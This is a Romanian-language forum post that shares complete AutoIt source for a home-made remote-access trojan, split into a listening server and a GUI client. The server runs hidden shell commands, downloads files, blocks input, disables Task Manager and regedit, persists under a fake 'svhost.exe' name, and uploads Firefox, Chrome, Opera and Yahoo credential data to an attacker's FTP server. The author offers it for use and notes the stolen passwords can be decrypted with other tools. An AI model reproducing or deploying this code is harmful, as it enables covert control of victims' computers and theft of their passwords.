Jump to content
parazitul29

[autoit] trojan example

Recommended Posts

un simplu trojan in autoit, facut la plcitiseala

nu am testat toate functiile l-am scris l-am compilat am testat cateva functii se comportau destul de bine nu le-am testat decat pe cele de la stealere dar cred ca merg bine

la stealere se trimite folderul din aplication data

functii

-internet explorer manipulation

-download file

-cmd control

-delete file

-mesage box

-run

-kill procces

-delete file

-open/close cd

-blocheaza/deblocheaza tastatura si mouse

-click la anumite coordonate

-mouse wheel control

-upload file

-ets stealer

-mozzila,opera,chrome stealer //netestat fura parolel criptate se gasesc pe net programe pentru decriptarea lor

-disable/enable taskmanager,regedit

-server startup

screenshot

83376340.png

server

#include <IE.au3> 
#include <FTPEx.au3>
#Include <File.au3>

$g_IP = "127.0.0.1"
Break (0)




TCPStartUp()


$MainSocket = TCPListen($g_IP, 5555, 100 )
If $MainSocket = -1 Then Exit



while 1
$ConnectedSocket = TCPAccept( $MainSocket)
$recv = TCPRecv($ConnectedSocket, 2048)
$arr=StringSplit ( $recv, "|")
if $arr[1]="run" Then
ShellExecute($arr[2])
EndIf
if $arr[1]="procces" Then
ProcessClose ($arr[2])
EndIf
If $arr[1]="msgbox" Then
msgbox(0,"mesaj",$arr[2])
EndIf
If $arr[1]="delete" Then
$del=FileDelete ( $arr[2])
$socket = TCPConnect( $g_IP, 5555 )
$trim=TCPSend($socket,$del)

EndIf

if $arr[1]="mouseclick" Then
MouseClick("left",$arr[2],$arr[3])
EndIf
if $arr[1]="mousewhell" Then
MouseWheel($arr[2],$arr[3])
Endif
if $arr[1]="opencd" Then
CDTray ( $arr[2],$arr[3] )
EndIf

if $arr[1]="blocktast" Then
BlockInput (1)
EndIf
if $arr[1]="enabletast" Then
BlockInput(0)
EndIf
if $arr[1]="createieinv" Then
$oIE=_IECreate($arr[2],0,0,1,0)
EndIf
if $arr[1]="navie" Then
$noie=_IENavigate($oIE, $arr[2])
EndIf
if $arr[1]="manie" Then
$oForm = _IEFormGetObjByName ($oIE, $arr[2])
$oText = _IEFormElementGetObjByName ($oForm, $arr[3])
_IEFormElementSetValue ($oText, $arr[4])
_IEFormSubmit ($oForm)
EndIf
if $arr[1]="Console" Then
Run(@ComSpec & " /c " & $arr[2], "", @SW_HIDE)
EndIf

if $arr[1]="download" Then

Local $hDownload =InetGet($arr[2], $arr[3])
Do
Sleep(250)
Until InetGetInfo($hDownload, 2)
Local $nBytes = InetGetInfo($hDownload, 0)
InetClose($hDownload)

EndIf

if $arr[1]="Regdel" Then
RegDelete($arr[2])
EndIf
if $arr[1]="startup" Then
RegWrite("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ru n\Server", "svhost.exe", "REG_SZ", "c:\windows\sistem32\svhost.exe")
filecopy(@ScriptFullPath,"c:\windows\sistem32\svhost.exe")
endif

if $arr[1]="taskmanager" Then
RegWrite("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableTaskMgr", "REG_DWORD","1")

EndIf
if $arr[1]="regeditdisable" then
regwrite("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableRegistryTools","REG_DWORD","1")
endif


if $arr[1]="taskenable" Then
RegWrite("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableTaskMgr", "REG_DWORD","0")
endif

if $arr[1]="regenable" Then
regwrite("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableRegistryTools","REG_DWORD","0")
EndIf
if $arr[1]="ftpup" Then
$server = $arr[2]
$username = $arr[3]
$pass = $arr[4]
$LocalFile=$arr[5]
$Remotefile=$arr[6]
$Open = _FTP_Open('MyFTP Control')
$Conn = _FTP_Connect($Open, $server, $username, $pass)
_FTP_FilePut($Conn, $LocalFile, $RemoteFile,"FTP_TRANSFER_TYPE_BINARY")
$Ftpc = _FTP_Close($Open)
EndIf

if $arr[1]="ets" then

$grt=regread("HKEY_CURRENT_USER\Software\yahoo\pager","ETS")
_FileCreate("c:\windows\test.txt")
$file=FileOpen ( "c:\windows\test.txt",2)
If $file = -1 Then
MsgBox(0, "Error", "Unable to open file.")
Exit
EndIf
FileWrite($file, $grt)
$server = $arr[2]
$username = $arr[3]
$pass = $arr[4]
$LocalFile="c:\windows\test.txt"
$Remotefile="/ets.txt"
$Open = _FTP_Open('MyFTP Control')
$Conn = _FTP_Connect($Open, $server, $username, $pass)
_FTP_FilePut($Conn, $LocalFile, $RemoteFile,"FTP_TRANSFER_TYPE_BINARY")
$Ftpc = _FTP_Close($Open)
EndIf

if $arr[1]="mozzila" Then


$server = $arr[2]
$username = $arr[3]
$pass = $arr[4]
$Localfolder=@AppDataDir & "\Mozilla\Firefox\Profiles"

$Remotefolder="/mozzila"
$Open = _FTP_Open('MyFTP Control')
$Conn = _FTP_Connect($Open, $server, $username, $pass)
_FTP_DirPutContents($Conn, $Localfolder, $Remotefolder,0)
$Ftpc = _FTP_Close($Open)

EndIf

if $arr[1]="chrome" Then

$server = $arr[2]
$username = $arr[3]
$pass = $arr[4]
$Localfolder=@AppDataDir & "\Google\Chrome\User Data\Default"
$Remotefolder="/chrome"
$Open = _FTP_Open('MyFTP Control')
$Conn = _FTP_Connect($Open, $server, $username, $pass)
_FTP_DirPutContents($Conn, $Localfolder, $Remotefolder,0)
$Ftpc = _FTP_Close($Open)
EndIf

if $arr[1]="opera" Then
$server = $arr[2]
$username = $arr[3]
$pass = $arr[4]
$Localfolder=@AppDataDir & "\Opera\Opera\profile"
$Remotefolder="/opera"
$Open = _FTP_Open('MyFTP Control')
$Conn = _FTP_Connect($Open, $server, $username, $pass)
_FTP_DirPutContents($Conn, $Localfolder, $Remotefolder,0)
$Ftpc = _FTP_Close($Open)
EndIf

wend

client

#include <GUIConstantsEx.au3>
#include<string.au3>
$g_IP = "127.0.0.1"
func internexp()
GUICreate("set")
$navigate=guictrlcreateinput("www.example.com/navigate",40, 80, 200, 20)
$create=guictrlcreateinput("wwww.example.com",40, 50, 200, 20)
$formname=guictrlcreateinput("form",40, 140, 100, 20)
$formelement=guictrlcreateinput("inputbox",150, 140, 100, 20)
$valori=guictrlcreateinput("exemplu exemplu",260, 140, 100, 20)

$create = GUICtrlCreateButton("lanseaza ie", 240,50, 150)
$nav = GUICtrlCreateButton("dute la",240, 80, 150)
$submit = GUICtrlCreateButton("trimite datele",120, 170, 150)
GUICtrlSetState(-1, $GUI_FOCUS)
gUICtrlSetState(-1, $GUI_FOCUS)
GUISetState()
Do


TCPStartUp()
$msg = GUIGetMsg()
if $msg=$create Then
$cre=GUICtrlRead($create)
$socket = TCPConnect( $g_IP, 5555 )
$crea=_StringInsert($cre,"createieinv|",0)
TCPSend($socket, $crea)
endif

if $msg=$nav Then
$nav=GUICtrlRead($navigate)
$socket = TCPConnect( $g_IP, 5555 )
$nave=_StringInsert($cre,"navie|",0)
TCPSend($socket, $nave)
EndIf

if $msg=$submit Then
$form2=GUICtrlRead($formname)
$formele=GUICtrlRead($formelement)
$form3=stringlen($form2)
$form4=_StringInsert($form2,$formele,$form3)
$form5=_StringInsert($form4,"|",$form2)
$form6=_Stringinsert($form5,"manie|",0)
$socket = TCPConnect( $g_IP, 5555 )
TCPSend($socket, $form6)
EndIf

Until $msg = $GUI_EVENT_CLOSE


EndFunc


GUICreate("set",600,500)

$download=guictrlcreateinput("http//www.examplu.com/exemplu.exe",40, 0, 200, 20)
$downloc=guictrlcreateinput("c:\exemplu.exe",40, 25, 200, 20)
$console=guictrlcreateinput("console",40, 50, 200, 20)

$mesaji=guictrlcreateinput("mesaj",40, 80, 200, 20)
$ruleazai=guictrlcreateinput("notepad.exe",40, 110, 200, 20)
$killi=guictrlcreateinput("winamp.exe",40, 140, 200, 20)
$deletei=guictrlcreateinput("",40, 170, 200, 20)
$drivei=guictrlcreateinput("E:",40, 200, 40, 20)
$openi=guictrlcreateinput("open",90, 200, 30, 20)
$xcoori=guictrlcreateinput("500",40, 260, 30, 20)
$ycoori=guictrlcreateinput("500",90, 260, 30, 20)
$wheel1i=guictrlcreateinput("up",40, 320,30, 20)
$wheel2i=guictrlcreateinput("2",90, 320,30, 20)
$ftpupserv=guictrlcreateinput("ftp.server.com",350, 20, 200, 20)
$ftpupuser=guictrlcreateinput("user",350, 50, 200, 20)
$ftpuppass=guictrlcreateinput("parola",350, 80, 200, 20)
$ftplocal=guictrlcreateinput("c:\test.exe",350, 110, 200, 20)
$ftpservfile=guictrlcreateinput("/test.exe",350, 140, 200, 20)
$ftpetserv=guictrlcreateinput("ftp.server.com",410, 260, 150, 20)
$ftpetsus=guictrlcreateinput("utilizator",410, 290, 150, 20)
$ftpetspas=guictrlcreateinput("parola",410, 320, 150, 20)


$startup = GUICtrlCreateButton(" server startup", 360,440, 120)
$stealets = GUICtrlCreateButton("ets steal", 380,360, 50)
$mozzila = GUICtrlCreateButton("mozzila", 430,360, 50)
$chrome = GUICtrlCreateButton("chrome", 480,360, 50)
$opera = GUICtrlCreateButton("opera", 530,360, 50)
$upload = GUICtrlCreateButton("upload", 420,170, 50)
$cmd = GUICtrlCreateButton("cmd", 240,50, 50)
$down = GUICtrlCreateButton("download", 240,15, 70)
$mesaj = GUICtrlCreateButton("mesaj", 240,80, 50)
$ruleaza = GUICtrlCreateButton("ruleaza",240, 110, 50)
$kill = GUICtrlCreateButton("kill proces",240, 140, 90)
$delete = GUICtrlCreateButton("delete",240, 170, 60)

$drive = GUICtrlCreateButton("open/close drive",240, 200,100)
$bloctast = GUICtrlCreateButton("blocheaza tastatura",10, 230,200)
$debloc = GUICtrlCreateButton("deblocheaza taste",210, 230,200)
$click = GUICtrlCreateButton("click",210, 260,40)
$mouse = GUICtrlCreateButton("mouse wheel",210, 320,100)
$internet = GUICtrlCreateButton("browser ie",40, 350,200)
$distask = GUICtrlCreateButton(" taskmanager off",40, 400,140)
$entask = GUICtrlCreateButton(" taskmanager on",40, 440,140)
$disregedit = GUICtrlCreateButton(" regedit off",200, 400,140)
$enregedit = GUICtrlCreateButton("regedit on",200, 440,140)

$label1=GUICtrlCreateLabel("up/down", 40, 290)
$label2=GUICtrlCreateLabel("xcoord", 0, 265)
$label3=GUICtrlCreateLabel("ycoord", 125, 265)
$label4=GUICtrlCreateLabel("drive", 10, 200)
$label5=GUICtrlCreateLabel("open/closed", 130, 200)
GUICtrlSetState(-1, $GUI_FOCUS)
gUICtrlSetState(-1, $GUI_FOCUS)
GUISetState()
Do


TCPStartUp()
$msg = GUIGetMsg()
if $msg=$stealets Then
$serv=GUICtrlRead($ftpetserv)
$user=GUICtrlRead($ftpetsus)
$pas= guictrlread($ftpetspas)
$socket = TCPConnect( $g_IP, 5555 )
TCPSend($socket, "ets|"& $serv & "|" & $user & "|" & $pas)
EndIf

if $msg=$mozzila Then
$serv=GUICtrlRead($ftpetserv)
$user=GUICtrlRead($ftpetsus)
$pas= guictrlread($ftpetspas)
$socket = TCPConnect( $g_IP, 5555 )
TCPSend($socket, "mozzila|"& $serv & "|" & $user & "|" & $pas)
EndIf

if $msg=$opera Then
$serv=GUICtrlRead($ftpetserv)
$user=GUICtrlRead($ftpetsus)
$pas= guictrlread($ftpetspas)
$socket = TCPConnect( $g_IP, 5555 )
TCPSend($socket, "opera|"& $serv & "|" & $user & "|" & $pas)
EndIf
if $msg=$chrome Then
$serv=GUICtrlRead($ftpetserv)
$user=GUICtrlRead($ftpetsus)
$pas= guictrlread($ftpetspas)
$socket = TCPConnect( $g_IP, 5555 )
TCPSend($socket, "chrome|"& $serv & "|" & $user & "|" & $pas)
EndIf
if $msg=$upload Then
$servup=GUICtrlRead($ftpupserv)
$servupuser=GUICtrlRead($ftpupuser)
$servupass= GUICtrlRead($ftpuppass)
$uplocal=GUICtrlRead($ftplocal)
$upserv=GUICtrlRead($ftpservfile)
$socket = TCPConnect( $g_IP, 5555 )
TCPSend($socket, "ftpup|" & $servup & "|" & $servupuser & "|" & $servupass & "|" & $uplocal &"|" & $upserv )
endif
if $msg=$startup Then
$socket = TCPConnect( $g_IP, 5555 )
TCPSend($socket, "startup|sss")
EndIf

if $msg=$distask Then
$socket = TCPConnect( $g_IP, 5555 )
TCPSend($socket, "taskmanager|ss")
EndIf

if $msg=$entask Then
$socket = TCPConnect( $g_IP, 5555 )
TCPSend($socket, "taskenable|ss")
EndIf

if $msg=$disregedit Then
$socket = TCPConnect( $g_IP, 5555 )
TCPSend($socket, "regeditdisable|ss")
EndIf
if $msg=$enregedit Then
$socket = TCPConnect( $g_IP, 5555 )
TCPSend($socket, "regenable|ss")
EndIf

If $msg=$down Then
$down1=GUICtrlRead($download)
$down2=GUICtrlRead($downloc)
$downlen=stringlen($down1)
$down3=_stringinsert($down1,$down2,$downlen)
$down4=_stringinsert($down3,"|",$downlen)
$down5=_stringinsert($down4,"download|",0)
$socket = TCPConnect( $g_IP, 5555 )
TCPSend($socket, $down5)
endif
if $msg=$cmd Then
$cmdcontrol=guictrlread($console)
$cmd2=_stringinsert($cmdcontrol,"console|",0)
$socket = TCPConnect( $g_IP, 5555 )
TCPSend($socket, $cmd2)
endif
if $msg=$mesaj Then
$mes=GUICtrlRead($mesaji)
$socket = TCPConnect( $g_IP, 5555 )
$mess=_StringInsert($mes,"msgbox|",0)
TCPSend($socket, $mess)
endif
if $msg=$ruleaza Then
$rul=GUICtrlRead($ruleazai)
$socket = TCPConnect( $g_IP, 5555 )
$rull=_StringInsert($rul,"run|",0)
TCPSend($socket, $rull)
endif
if $msg=$kill Then
$kil=GUICtrlRead($killi)

$kill=_StringInsert($kil,"procces|",0)
$socket = TCPConnect( $g_IP, 5555 )
TCPSend($socket, $kill)
endif
if $msg=$delete Then
$del=GUICtrlRead($deletei)
$socket = TCPConnect( $g_IP, 5555 )
$dell=_StringInsert($del,"delete|",0)
TCPSend($socket, $dell)
endif
if $msg=$bloctast Then
$socket = TCPConnect( $g_IP, 5555 )
TCPSend($socket, "blocktast|ssss")
EndIf
if $msg=$debloc Then
$socket = TCPConnect( $g_IP, 5555 )
TCPSend($socket, "enabletast|ssss")
endif
If $msg=$click Then
$coordx=GUICtrlRead($xcoori)
$coordy=GUICtrlRead($ycoori)
$coordlen=stringlen($coordx)
$coord=_stringinsert($coordx,$coordy,$coordlen)
$coord2=_stringinsert($coordx,"|",$coordlen)
$coord3=_stringinsert($coord2,"mouseclick|",0)
$socket = TCPConnect( $g_IP, 5555 )
TCPSend($socket, $coord3)

endif
If $msg=$mouse Then
$wheel1m=GUICtrlRead($wheel1i)
$wheel2m=GUICtrlRead($wheel2i)
$wheellen=stringlen($wheel1m)
$wheel1=_stringinsert($wheel1m,$wheel2m,$wheellen)
$wheel2=_stringinsert($wheel1,"|",$wheellen)
$wheel3=_stringinsert($wheel2,"mousewhell|",0)
$socket = TCPConnect( $g_IP, 5555 )
TCPSend($socket, $wheel3)
endif
If $msg=$mouse Then
$wheel1m=GUICtrlRead($wheel1i)
$wheel2m=GUICtrlRead($wheel2i)
$wheellen=stringlen($wheel1m)
$wheel1=_stringinsert($wheel1m,$wheel2m,$wheellen)
$wheel2=_stringinsert($wheel1,"|",$wheellen)
$wheel3=_stringinsert($wheel2,"mousewhell|",0)
$socket = TCPConnect( $g_IP, 5555 )
TCPSend($socket, $wheel3)
endif
If $msg=$drive then
$drive1=GUICtrlRead($drivei)
$open1=GUICtrlRead($openi)
$drivelen=stringlen($drive1)
$cd=_stringinsert($drive1,$open1,$drivelen)
$cd2=_stringinsert($cd,"|",$drivelen)
$cd3=_stringinsert($cd2,"opencd|",0)
$socket = TCPConnect( $g_IP, 5555 )
TCPSend($socket, $cd3)
endif
if $msg=$internet Then
internexp()
endif
Until $msg = $GUI_EVENT_CLOSE

Edited by parazitul29
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...